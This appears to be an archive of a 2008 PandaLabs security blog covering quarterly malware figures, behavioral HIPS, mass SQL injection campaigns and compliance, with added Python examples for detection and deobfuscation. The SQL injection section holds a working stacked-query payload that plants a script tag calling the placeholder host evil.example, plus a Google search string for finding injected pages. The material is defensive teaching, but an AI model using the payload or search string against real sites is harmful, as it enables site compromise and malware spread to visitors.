PandaLabs Q2 Figures

July 7, 2008

Today we published our Q2 figures covering the most relevant trends in the malware landscape. Some of the key points from the Q2 report include:

  • Distribution of Banker Trojan families by prevalence in the market.
  • Distribution of active malware by country (PCs with active malware running in memory).
  • Spam levels fluctuated between 60% and 94% of all email on the Internet.

Banker Trojans remain a prominent factor in identity theft. As covered in the report, Banker Trojans grew by 400%, an increase well above that of previous years. In addition, Russian Banker Trojans remain strong in the overall distribution by family.

In the first half of Q2 2008 we saw SQL injection attacks emerge as the vehicle for mass hacking campaigns whose aim is to distribute as much malware as possible. In short, cyber-crime keeps evolving and should not be ignored when implementing security at your organization. The report can be found here:


Host Intrusion Prevention: Behavioral Analysis

June 13, 2008

Host Intrusion Prevention Systems, better known as HIPS, have been on the market for some time. HIPS technologies work on the premise of providing end-point intrusion prevention against anomalous system behavior.

Over the years HIPS has been developed for the anti-malware space to complement existing technologies (signatures and heuristics) and to improve detection. This was part of a strategy to thwart 0-day malware with a proactive rather than a reactive approach to identifying malicious code, so the technology itself is not new to the market.

But the way a vendor goes about fulfilling this model varies with the architecture involved. Interestingly, there are many misconceptions about the quality and effectiveness of the HIPS technologies on the market today. In fact the only architectural standard I have seen is the one defined by Gartner analyst Neil MacDonald.

For example, rule-based technologies proactively defend against 0-day malware to a certain degree; however, they often require initial training and tuning before they can block an unknown threat with confidence, which results in high operating costs over time. This is especially true given the complexity of today's diversified networks.

Most vendors on the market today include HIPS in their technology portfolios; what is missing from many offerings, however, is behavioral analysis (very different from behavioral blocking or from policy enforcement and control).

What is Behavioral Analysis and why is it important?

Behavioral analysis works on the premise of intelligently inspecting a running process and terminating it depending on its behavior (the closest analogy in the computing world would be a neural network). In other words, it looks at a process and its behavior in context and decides whether to terminate or block that process. This is not a static, linear decision but a dynamic, evolving one. Behavioral blocking, by contrast, focuses on denying specific actions from a process that match a prohibited behavior.
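To make the distinction concrete, here is an added example (not TruPrevent code, and not anything from the original post) that runs the same two process traces through a behavioral blocker and a behavioral analyzer. The blocker judges each event on its own against a deny list; the analyzer keeps state across the trace and scores combinations (a credential-store read followed by an outbound connection, a process launching or persisting a file it wrote itself). The traces, paths, registry keys, the 203.0.113.10 address and the scores are all constructed for the demo; the analyzer is a hand-written scoring model, not a learned one.

```python
"""
Behavioral blocking versus behavioral analysis on the same process trace.

Added example for this post; it is not TruPrevent code. The event traces,
paths, registry keys, hosts and scores below are constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Event:
    action: str        # file_read, file_write, reg_set, net_connect, proc_create
    target: str        # path, registry key or host:port
    detail: str = ""   # registry value data for reg_set


# Behavioral blocking: a flat deny list. Each event is judged on its own,
# with no memory of what the process did before.
BLOCK_RULES = [
    ("file_write", re.compile(r"^C:\\Windows\\System32\\", re.I), "write under System32"),
    ("reg_set", re.compile(r"\\CurrentVersion\\Run\\", re.I), "write to a Run key"),
]


def behavioral_block(trace: List[Event]) -> Optional[Tuple[int, str]]:
    """Return (event index, rule name) for the first event a deny rule matches, else None."""
    for i, ev in enumerate(trace):
        for action, pattern, name in BLOCK_RULES:
            if ev.action == action and pattern.search(ev.target):
                return i, name
    return None


# Behavioral analysis: score the trace as a whole. The indicators depend on
# combinations and ordering, not on any single action.
CRED_STORE = re.compile(r"\\Login Data$|\\signons\.sqlite$", re.I)
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
SYSTEM_DIR = re.compile(r"^C:\\Windows\\", re.I)


def analyze(trace: List[Event]) -> Tuple[int, List[str]]:
    """Return (score, reasons) for a whole trace, keeping state across events."""
    score, reasons = 0, []
    written = set()           # files this process created (lower-cased)
    read_credentials = False  # has it touched a browser credential store?
    for ev in trace:
        if ev.action == "file_write":
            written.add(ev.target.lower())
            if SYSTEM_DIR.match(ev.target):
                score += 10
                reasons.append("writes into the Windows directory")
            elif TEMP_EXE.search(ev.target):
                score += 5
                reasons.append("drops an executable in the temp directory")
        elif ev.action == "file_read" and CRED_STORE.search(ev.target):
            read_credentials = True
        elif ev.action == "net_connect" and read_credentials:
            score += 40
            reasons.append("connects out after reading a credential store")
            read_credentials = False  # count the read-then-connect pairing once
        elif ev.action == "proc_create" and ev.target.lower() in written:
            score += 30
            reasons.append("executes a file it dropped itself")
        elif ev.action == "reg_set" and ev.detail.lower() in written:
            score += 30
            reasons.append("persists a file it dropped itself")
    return score, reasons


def verdict(trace: List[Event], threshold: int = 50) -> str:
    return "terminate" if analyze(trace)[0] >= threshold else "allow"


# Constructed trace of a legitimate updater: one system write, one download.
UPDATER_TRACE = [
    Event("file_write", r"C:\Windows\System32\vendor_runtime.dll"),
    Event("net_connect", "update.vendor.example:443"),
]

# Constructed trace of a password-stealing Trojan. No single action trips the
# deny list: it persists via RunOnce rather than Run and never touches System32.
TROJAN_TRACE = [
    Event("file_read", r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("file_write", r"C:\Users\bob\AppData\Local\Temp\svc.exe"),
    Event("reg_set", r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\svc",
          r"C:\Users\bob\AppData\Local\Temp\svc.exe"),
    Event("net_connect", "203.0.113.10:443"),
    Event("proc_create", r"C:\Users\bob\AppData\Local\Temp\svc.exe"),
]

if __name__ == "__main__":
    for name, trace in (("updater", UPDATER_TRACE), ("trojan", TROJAN_TRACE)):
        print(name, "blocking:", behavioral_block(trace))
        print(name, "analysis:", analyze(trace), "->", verdict(trace))
```

Run stand-alone, the blocker terminates the updater on its first event and lets the Trojan through, while the analyzer allows the updater (score 10) and terminates the Trojan (score 105): the same deny-list rule that produces the false positive is also the one the Trojan side-steps, which is the cost of judging actions without context.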

Similarly, behavioral analysis technologies are included in Panda TruPrevent Technologies:



SQL Injection Attacks: The future of mass hacking campaigns (updated)

June 11, 2008

SQL injection attacks are evolving into the primary means of transporting malicious scripts that attackers want to insert into legitimate web-sites. Typically the web-site becomes a vehicle for distributing Trojans through scripts crafted to exploit certain vulnerabilities on visiting PCs.


These scripts are often designed to exploit vulnerabilities for which the vendor already has a patch available; statistically, however, a certain percentage of users will not have patched their systems. In addition, some of these attacks have used 0-day vulnerabilities to spread malware to unsuspecting users, as in the case of the recent Adobe Flash vulnerability.


In most cases the JavaScript used to trigger the vulnerability is obfuscated and very difficult to analyze, so the real intention behind the script (exploitation of vulnerabilities) cannot be seen by the naked eye. It takes decoding to reveal the actual exploit code.
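As an added example of that decoding step (not the lab's tooling and not code from the original post), the script below statically peels the two encoding layers most often stacked in injected scripts of this kind, String.fromCharCode(...) number lists and unescape("%XX...") strings, repeating until nothing changes, and then lists the script/iframe sources that were hidden. The sample script is constructed for the demo, and evil.example is a placeholder host.

```python
"""
Static peeling of two common JavaScript encoding layers,
String.fromCharCode(...) and unescape("%XX"), followed by extraction of
the script/iframe sources they concealed. Added example, not the lab's
tooling; the sample script and its host name are constructed for the demo.
"""
import re
from urllib.parse import unquote

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]*)\)")
UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")
SRC_ATTR = re.compile(r"<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def js_string_literal(text: str) -> str:
    """Re-wrap decoded text as a single-quoted JS literal so the surrounding
    expression (eval(...), document.write(...)) still reads naturally."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def js_unescape(text: str) -> str:
    """JavaScript unescape(): %uXXXX gives a UTF-16 unit, %XX a Latin-1 byte."""
    text = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")


def peel_once(js: str) -> str:
    """Replace one layer of fromCharCode/unescape calls with their plaintext."""
    js = FROMCHARCODE.sub(
        lambda m: js_string_literal(
            "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
        ),
        js,
    )
    js = UNESCAPE.sub(lambda m: js_string_literal(js_unescape(m.group(2))), js)
    return js


def deobfuscate(js: str, max_rounds: int = 10) -> str:
    """Peel layers until a fixed point; nested encodings unwrap one round at a time."""
    for _ in range(max_rounds):
        peeled = peel_once(js)
        if peeled == js:
            break
        js = peeled
    return js


def extract_references(js: str) -> list:
    """List the distinct script/iframe src values visible in (decoded) script text."""
    return sorted(set(SRC_ATTR.findall(js)))


# Constructed sample: an unescape()d tag wrapped in a fromCharCode layer, so
# that neither "<script" nor the host name appears in the raw page source.
INNER = 'document.write(unescape("%3Cscript%20src%3Dhttp%3A//evil.example/x.js%3E%3C/script%3E"));'
SAMPLE = "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in INNER) + "));"

if __name__ == "__main__":
    print("raw      :", extract_references(SAMPLE))
    decoded = deobfuscate(SAMPLE)
    print("decoded  :", decoded)
    print("sources  :", extract_references(decoded))
```

Static peeling like this only handles encodings that are pure string transforms; scripts that build their payload with arithmetic, string splitting or runtime-dependent keys need a sandboxed interpreter instead, which is where the extra lab effort the post mentions goes.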


The result is extra time and effort on the part of the anti-virus lab engineer to create an effective detection for malware delivered through encoded JavaScript.


Meanwhile, the average rate of infection among protected networks is anywhere from 70% to 75%, according to research conducted by PandaLabs on over 1,200 networks across the globe. This obviously raises questions about the level and quality of protection companies have running on their PCs.


Little is known, however, about the true intentions or motivations behind these mass hacking campaigns. From our perspective it is purely business: with a profit-driven approach, attackers will do pretty much anything to make a buck.


So exactly how do attackers gain access to web-sites without administrative privileges or without exploiting site-specific vulnerabilities? Good question. It is quite obvious that they are doing this through automation, as it would be impossible to hack these sites manually. Some recent campaigns have compromised in the range of 250,000 to 500,000 sites almost overnight. What is not entirely clear is how they gain access at such a high rate without customizing the attack on a site-by-site basis.

One theory is tools that use the Google API to automate discovering and validating whether a site may be vulnerable to SQL injection, a process that would normally require visual inspection. An example of a query string that could be used is: intitle:"<iframe src=http" (a query of that form surfaces pages that already carry an injected iframe, which is the validation half of the process). Such a tool would also be capable of constructing a specific injection routine to run against the discovered targets. Certainly there are tools out there capable of conducting automated blind SQL injection attacks, including the discovery of vulnerable targets.
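The reason the attack generalizes across hundreds of thousands of unrelated sites is that it needs nothing site-specific: a numeric parameter pasted into a query string on a server that executes batches is enough to append an UPDATE that tags every text column. The added example below (not PandaLabs tooling, and not code from the original post) shows that mechanism on an in-memory SQLite database with constructed rows: the concatenated query that lets the injected batch run, the parameterized query that does not, and the catalog-driven scan a site owner would run to find which cells were tagged. The payload follows the shape of these campaigns but names the columns directly instead of enumerating the catalog with a cursor, and evil.example is a placeholder host.

```python
"""
Mechanics of a mass SQL injection: the concatenated query that lets an
injected batch run, the parameterized query that does not, and a scan of
every text column for injected script/iframe references.

Added example for this post, not PandaLabs tooling. Uses an in-memory
SQLite database with constructed rows; the host name is a placeholder.
"""
import re
import sqlite3
from typing import List, Tuple

# Constructed schema: a small content site with two text-bearing tables.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO products VALUES (1, 'Widget', 'A fine widget.');
INSERT INTO products VALUES (2, 'Gadget', 'A fine gadget.');
INSERT INTO news VALUES (1, 'Launch', 'We launched.');
"""

INJECTED_TAG = "<script src=http://evil.example/x.js></script>"  # placeholder host

# The value an attacker sends in the "id" parameter: close the numeric
# comparison, then append UPDATEs that tag every text column. The real
# campaigns found the columns by walking the catalog with a cursor.
PAYLOAD = (
    "1; "
    f"UPDATE products SET name = name || '{INJECTED_TAG}', "
    f"description = description || '{INJECTED_TAG}'; "
    f"UPDATE news SET title = title || '{INJECTED_TAG}', "
    f"body = body || '{INJECTED_TAG}'"
)

TAG_RE = re.compile(r"<(?:script|iframe)\b[^>]*\bsrc\s*=", re.I)


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, product_id: str) -> None:
    """Insecure: input is pasted into the SQL text and the whole string runs as
    a batch (executescript mirrors the multi-statement execution on the
    database servers these campaigns hit), so the appended UPDATEs run too."""
    conn.executescript("SELECT name FROM products WHERE id = " + product_id + ";")


def safe_lookup(conn: sqlite3.Connection, product_id) -> List[str]:
    """Parameterized: the input is bound as a value and never parsed as SQL."""
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))
    return [name for (name,) in rows]


def text_columns(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Enumerate (table, column) pairs with a text type, straight from the catalog."""
    cols = []
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for _cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            declared = (ctype or "").upper()
            if "CHAR" in declared or "TEXT" in declared:
                cols.append((table, name))
    return cols


def tainted_cells(conn: sqlite3.Connection) -> List[Tuple[str, str, str]]:
    """Return (table, column, value) for every text cell carrying an injected tag."""
    hits = []
    for table, col in text_columns(conn):
        for (value,) in conn.execute(f'SELECT "{col}" FROM "{table}"'):
            if isinstance(value, str) and TAG_RE.search(value):
                hits.append((table, col, value))
    return hits


if __name__ == "__main__":
    conn = fresh_db()
    vulnerable_lookup(conn, PAYLOAD)
    print("cells tagged through the concatenated query:", len(tainted_cells(conn)))
    conn = fresh_db()
    print("parameterized lookup with the payload:", safe_lookup(conn, PAYLOAD))
    print("cells tagged through the parameterized query:", len(tainted_cells(conn)))
```

The scan is the part worth keeping: it reads the table list and column types from the catalog rather than from a hand-kept list, which is exactly what the injected payloads did in reverse, and it will find a tag appended to a column nobody remembered was rendered into a page.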




LayerOne Security Conference Video Available

May 23, 2008

Last weekend we participated in a smaller regional security conference in Pasadena, California called LayerOne, which is held yearly at the Pasadena Hilton. There were a number of great talks, and I gave one on the evolution of cyber-crime and its prevalence. I am making the video available here.

Yesterday’s Webinar Available!

May 22, 2008

Yesterday’s webinar on Customer Privacy, Malware and Government Regulations is now available for your viewing pleasure. Enjoy!



How regulations affect small to mid-size companies

May 20, 2008

It is important to note that not only large corporations are affected by regulatory standards; small and mid-size companies are equally affected, especially when their core business deals with classes of information protected by law (patient information, credit card information, financial data, etc.).

A very good example is a regional medicare facility with fewer than 500 employees. One might think it is not subject to the same regulations because of its size, but HIPAA is HIPAA, and it applies to any organization that stores and maintains protected patient information.

For example, if this fictional facility had a screen-logger on a PC holding any of the above classes of information, this could violate the following requirement and could result in fines:

HIPAA Security Rule §164.312(a)(1) (Access Control), which implements the Information Access Management standard of §164.308(a)(4): “Implement technical policies and procedures for electronic information systems that maintain electronic protected health information to allow access only to those persons or software programs that have been granted access rights as specified in §164.308(a)(4) [Information Access Management].”

It also leads me to believe that controls implemented to enforce compliance do not always provide assurance that one is protected. This is particularly true in light of the recent high-profile data security breaches at corporations that had followed regulatory standards but were somehow still compromised.

In conclusion, security should not be ignored within small and mid-size companies, especially those that handle protected classes of information.


Anatomy of a data breach

May 4, 2008

In 2007 and 2008 the industry has seen an upsurge in data breaches affecting millions of consumers and costing corporations heavily in fines.

Data breaches can expose consumer information in a number of ways that vary in complexity. The common distinction is between data extracted from stolen physical assets and actual electronic breaches of perimeter security.

While there are certainly a number of cases in which stolen assets account for the breach, we are seeing electronic breaches behind some of the most famous incidents of 2007 and 2008:

  1. TJ Maxx
  3. Hannaford Bros

In fact the financial community has experienced twice as many incidents in 2008 as in all of 2007, according to a study by the Identity Theft Resource Center (ITRC). These incidents occurred despite regulatory laws that were supposedly designed to mitigate and reduce the risk window and avoid such embarrassing situations.

Take for example an organization that has been PCI compliant for years but suffered a data breach in which hackers placed targeted malware on the credit card processing servers of a major retailer. The question the security team has to ask itself is: “Why didn’t my current anti-virus solution detect the threat?” I have an interesting hypothesis on this subject that can be found in the article “Regulatory Compliance and the Real Risk of Undetected Malware.”

In 2008 implementing measures to protect against data breaches will be critical to the long-term survival of any corporation. It is not a matter of if you will be breached but of when; therefore the primary goal must be to significantly reduce the acceptable loss and shrink the window of risk.

The risk window can be significantly reduced by implementing better information assurance standards that, at a minimum, address the following:

  1. Security audits should include more than just a vulnerability assessment or a penetration test when verifying that controls are adequate; they should also assess for existing breaches involving undetected malicious code.
  2. Don’t rely on anti-virus alone, as it protects you against only a small fraction of potential threats and will not detect targeted attacks. Take advantage of best-of-breed proactive security (HIPS or anomaly detection systems).
  3. Use a multi-layer approach when protecting assets (perimeter, messaging and end-point layers).

Panda Security is one step ahead when it comes to security, and we have a number of technologies that will aid in reducing the risk window and eliminating as much of the associated loss as possible. These technologies are divided as follows:

  1. Security audit and assessment tools (i.e. Panda Malware Radar)
  2. Proactive security (i.e. TruPrevent technologies)
  3. Fraud intelligence services (Targeted Attack Alert Services)
  4. Preventing fraudulent financial transactions (Panda Security for Internet Transactions)

Thoughts or comments?